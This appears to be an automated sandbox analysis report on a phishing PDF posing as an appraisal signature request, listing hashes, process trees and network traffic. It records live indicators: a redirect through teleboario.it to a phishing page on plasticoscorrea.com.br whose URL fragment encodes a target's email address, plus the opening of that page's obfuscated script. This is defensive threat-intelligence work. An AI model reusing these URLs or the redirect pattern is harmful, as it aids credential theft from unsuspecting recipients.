Edit tour

Windows Analysis Report
Appraisal-nation-Review_and_Signature_Request46074.pdf

Overview

General Information

Sample name:	Appraisal-nation-Review_and_Signature_Request46074.pdf
Analysis ID:	1586844
MD5:	0513c541b2989b64dfd5a1a96e064269
SHA1:	009a8b46c97704ddcfbe17aad39ebf60d2a60aa7
SHA256:	fd50c264c2fde8edb2ca0227f56cb778c5be75af7926437c43ec68790d30b303
Infos:

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected landing page (webpage, office document or email)

AI detected suspicious Javascript

HTML page contains obfuscated javascript

Contains long sleeps (>= 3 min)

Creates files inside the system directory

Deletes files inside the Windows folder

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Classification

Process Tree

System is w11x64_office

Acrobat.exe (PID: 6156 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Appraisal-nation-Review_and_Signature_Request46074.pdf" MD5: 4354BCD7483AABB81809350484FFD58F)

AcroCEF.exe (PID: 1920 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: B104218348848F1F113AF11C0982931A)

AcroCEF.exe (PID: 1688 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/24.4.20272 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\UserData" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2128 --field-trial-handle=1600,i,12043421776044065048,9780518258914770983,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: B104218348848F1F113AF11C0982931A)

AdobeCollabSync.exe (PID: 7748 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe" -c MD5: 1C26C611BFACED153F60CB1653A8745D)

AdobeCollabSync.exe (PID: 7824 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe" -c --type=collab-renderer --proc=7748 MD5: 1C26C611BFACED153F60CB1653A8745D)

FullTrustNotifier.exe (PID: 5288 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe" GetChannelUri MD5: 92366A2F482926C3D0DD02D6F952F742)

AdobeCollabSync.exe (PID: 7964 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe" -c MD5: 1C26C611BFACED153F60CB1653A8745D)

AdobeCollabSync.exe (PID: 8068 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe" -c --type=collab-renderer --proc=7964 MD5: 1C26C611BFACED153F60CB1653A8745D)

chrome.exe (PID: 2296 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.teleboario.it/teleboario_adv.php?variable=403&url=%2F%2Fplasticoscorrea.com.br%2Fscript%2F%23Y2xpZW50cmVsYXRpb25zQGFwcHJhaXNhbC1uYXRpb24uY29t MD5: 290DF23002E9B52249B5549F0C668A86)

chrome.exe (PID: 6424 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1932,i,6939631540764321379,10229849018345657051,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20241209-180048.133000 --mojo-platform-channel-handle=2296 /prefetch:3 MD5: 290DF23002E9B52249B5549F0C668A86)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected landing page (webpage, office document or email)

Source: PDF document

Joe Sandbox AI: PDF document contains QR code

AI detected suspicious Javascript

Source: 0.0.id.script.csv

Joe Sandbox AI: Detected suspicious JavaScript with source url: https://plasticoscorrea.com.br/script/#Y2xpZW50cmV... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script uses the `eval` function to execute remote code, sends user data to an external server, and utilizes heavily obfuscated strings. Additionally, the script appears to be interacting with suspicious domains, further increasing the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and poses a significant security risk.

HTML page contains obfuscated javascript

Source: https://plasticoscorrea.com.br/script/#Y2xpZW50cmVsYXRpb25zQGFwcHJhaXNhbC1uYXRpb24uY29t

HTTP Parser: (function(_0x4a596b,_0x31a4ff){const _0x590499=_0xaaf2,_0x2b2108=_0x4a596b();while(!![]){try{cons

Source: https://plasticoscorrea.com.br/script/#Y2xpZW50cmVsYXRpb25zQGFwcHJhaXNhbC1uYXRpb24uY29t	HTTP Parser: No favicon
Source: https://plasticoscorrea.com.br/script/#Y2xpZW50cmVsYXRpb25zQGFwcHJhaXNhbC1uYXRpb24uY29t	HTTP Parser: No favicon

Source: unknown

HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.25:49752 version: TLS 1.2

Source: global traffic

HTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application%2Fx-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=c498711f02654edca8a715ca6e1cb4d4-dc31da17-845c-4cca-84e5-547d05dad708-6945&upload-time=1736439861541&w=0&anoncknm=al_app_anon&NoResponseBody=true HTTP/1.1Accept-Encoding: gzip, deflateContent-Length: 15932Content-Type: application/json; charset=UTF-8Host: browser.events.data.msn.cnConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View

IP Address: 104.26.5.30 104.26.5.30

Source: Joe Sandbox View

JA3 fingerprint: 091f51a7a1c3a4504a224cc081ce9cee

Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.73.31
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.73.30
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.73.30
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.73.30
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.73.30
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.73.30
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.73.30
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45

Source: global traffic	HTTP traffic detected: GET /rules/officeclicktorun.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.18129; Pro)Host: otelrules.svc.static.microsoft
Source: global traffic	HTTP traffic detected: GET /rules/rule120603v9s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.18129; Pro)Host: otelrules.svc.static.microsoft
Source: global traffic	HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.18129; Pro)Host: otelrules.svc.static.microsoft
Source: global traffic	HTTP traffic detected: GET /service/news/feed/pages/dashboard4?aver=1.1.200.0&over=10.0.22631.4169.amd64fre.ni_release.220506-1250&fring=Retail&devicetype=1&oem=VMware%2C%20Inc.&smode=false&machineId=%7BADA0F343-6E11-4C03-89DA-546517CD1A62%7D&clv=3.0&hver=524.30502.30.0&locale=en-US&region=CH&apikey=lxSNtibdZ45aPe8BHuUR6XwhuuruYfwejEYNpSqgcd&ocid=winp2widget&timeOut=2000&activityId=79a55ed2-c536-4feb-b823-3a9b5e5c40be&user=m-339A2A61895267C400B83F3088FA6607&cm=de-ch&caller=bgtask&theme=light&nw=false&msrc=2&it=app&scn=al_app_anon&clientFeatures=1 HTTP/1.1Referer: https://windows.msn.com/Accept-Encoding: gzip, deflatemuid: 339A2A61895267C400B83F3088FA6607User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0Host: assets.msn.comConnection: Keep-AliveCookie: MUID=339A2A61895267C400B83F3088FA6607
Source: global traffic	HTTP traffic detected: GET /weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/WindyV2.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: assets.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /teleboario_adv.php?variable=403&url=%2F%2Fplasticoscorrea.com.br%2Fscript%2F%23Y2xpZW50cmVsYXRpb25zQGFwcHJhaXNhbC1uYXRpb24uY29t HTTP/1.1Host: www.teleboario.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /script/ HTTP/1.1Host: plasticoscorrea.com.brConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /script/disk/slidercaptcha.css HTTP/1.1Host: plasticoscorrea.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://plasticoscorrea.com.br/script/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=07b8c9df6bd992d5879b57fe687fff5b
Source: global traffic	HTTP traffic detected: GET /script/disk/longbow.slidercaptcha.js HTTP/1.1Host: plasticoscorrea.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://plasticoscorrea.com.br/script/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=07b8c9df6bd992d5879b57fe687fff5b
Source: global traffic	HTTP traffic detected: GET /script/disk/longbow.slidercaptcha.js HTTP/1.1Host: plasticoscorrea.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=07b8c9df6bd992d5879b57fe687fff5b
Source: global traffic	HTTP traffic detected: GET /script/images/Pic3.jpg HTTP/1.1Host: plasticoscorrea.com.brConnection: keep-aliveOrigin: https://plasticoscorrea.com.brsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://plasticoscorrea.com.br/script/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=07b8c9df6bd992d5879b57fe687fff5b
Source: global traffic	HTTP traffic detected: GET /script/images/Pic2.jpg HTTP/1.1Host: plasticoscorrea.com.brConnection: keep-aliveOrigin: https://plasticoscorrea.com.brsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://plasticoscorrea.com.br/script/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=07b8c9df6bd992d5879b57fe687fff5b
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: plasticoscorrea.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://plasticoscorrea.com.br/script/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=07b8c9df6bd992d5879b57fe687fff5b
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2024/09/cropped-icone-32x32.png HTTP/1.1Host: plasticoscorrea.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://plasticoscorrea.com.br/script/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=07b8c9df6bd992d5879b57fe687fff5b
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2024/09/cropped-icone-32x32.png HTTP/1.1Host: plasticoscorrea.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=07b8c9df6bd992d5879b57fe687fff5b
Source: global traffic	HTTP traffic detected: GET /weathermapdata/1/static/news/TopStories_72x72.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: assets.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /script/sliderFail.php HTTP/1.1Host: plasticoscorrea.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=07b8c9df6bd992d5879b57fe687fff5b
Source: global traffic	HTTP traffic detected: GET /script/images/Pic1.jpg HTTP/1.1Host: plasticoscorrea.com.brConnection: keep-aliveOrigin: https://plasticoscorrea.com.brsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://plasticoscorrea.com.br/script/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=07b8c9df6bd992d5879b57fe687fff5b
Source: global traffic	HTTP traffic detected: GET /script/images/Pic2.jpg HTTP/1.1Host: plasticoscorrea.com.brConnection: keep-aliveOrigin: https://plasticoscorrea.com.brsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://plasticoscorrea.com.br/script/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=07b8c9df6bd992d5879b57fe687fff5b

Source: global traffic	DNS traffic detected: DNS query: www.teleboario.it
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: plasticoscorrea.com.br
Source: global traffic	DNS traffic detected: DNS query: use.fontawesome.com
Source: global traffic	DNS traffic detected: DNS query: picsum.photos
Source: global traffic	DNS traffic detected: DNS query: fastly.picsum.photos

Source: unknown

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 16:24:27 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://plasticoscorrea.com.br/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 16:24:28 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://plasticoscorrea.com.br/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 16:25:23 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://plasticoscorrea.com.br/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 16:25:24 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://plasticoscorrea.com.br/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8

Source: NGLClient_AcrobatReader124.4.20272.6.log.0.dr	String found in binary or memory: https://cc-api-data.adobe.io/ingest
Source: AdobeCollabSync.exe, 0000000A.00000002.2626724113.00000280ADCF9000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 0000000A.00000003.1473360991.00000280ADCF8000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 0000000A.00000003.1473968709.00000280ADCF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io
Source: AdobeCollabSync.exe, 0000000A.00000003.1473360991.00000280ADD18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/schemas/bulk_entity_v1.json
Source: AdobeCollabSync.exe, 0000000A.00000003.1473242444.00000280ADD46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/schemas/entity_v1
Source: AdobeCollabSync.exe, 0000000A.00000002.2626724113.00000280ADC96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/schemas/entity_v1.json
Source: AdobeCollabSync.exe, 0000000A.00000003.1473360991.00000280ADCD5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/sy&s
Source: AdobeCollabSync.exe, 0000000A.00000002.2626724113.00000280ADC96000.00000004.00000020.00020000.00000000.sdmp, EntitySync-2025-01-09.log.10.dr	String found in binary or memory: https://comments.adobe.io/sync/
Source: AdobeCollabSync.exe, 0000000A.00000002.2626724113.00000280ADD2E000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 0000000A.00000003.1473360991.00000280ADD18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/sync/(
Source: AdobeCollabSync.exe, 0000000A.00000003.1473360991.00000280ADD18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/sync/031:
Source: AdobeCollabSync.exe, 0000000A.00000002.2626724113.00000280ADD2E000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 0000000A.00000003.1473360991.00000280ADD18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/sync/4
Source: AdobeCollabSync.exe, 0000000A.00000003.1473360991.00000280ADD18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/sync/994:
Source: AdobeCollabSync.exe, 0000000A.00000003.1473968709.00000280ADD27000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 0000000A.00000002.2626724113.00000280ADD26000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 0000000A.00000003.1473360991.00000280ADD18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/sync/A
Source: AdobeCollabSync.exe, 0000000A.00000003.1473968709.00000280ADD27000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 0000000A.00000002.2626724113.00000280ADD26000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 0000000A.00000003.1473360991.00000280ADD18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/sync/F
Source: AdobeCollabSync.exe, 0000000A.00000003.1473360991.00000280ADD18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/sync/I
Source: AdobeCollabSync.exe, 0000000A.00000003.1473968709.00000280ADD27000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 0000000A.00000002.2626724113.00000280ADD26000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 0000000A.00000003.1473360991.00000280ADD18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/sync/Y
Source: AdobeCollabSync.exe, 0000000A.00000003.1473968709.00000280ADD27000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 0000000A.00000002.2626724113.00000280ADD26000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 0000000A.00000003.1473360991.00000280ADD18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/sync/n
Source: AdobeCollabSync.exe, 0000000A.00000002.2626724113.00000280ADCF9000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 0000000A.00000003.1473360991.00000280ADCF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.ioLments1
Source: AdobeCollabSync.exe, 0000000A.00000002.2626724113.00000280ADCF9000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 0000000A.00000003.1473360991.00000280ADCF8000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 0000000A.00000003.1473968709.00000280ADCF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.ioureka
Source: chromecache_154.3.dr, chromecache_150.3.dr	String found in binary or memory: https://docs.fastly.com/en/guides/common-400-errors#error-421-misdirected-request
Source: chromecache_153.3.dr, chromecache_156.3.dr	String found in binary or memory: https://picsum.photos/
Source: AdobeCollabSync.exe, 0000000A.00000003.1473360991.00000280ADD18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reviews.adobe.io

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
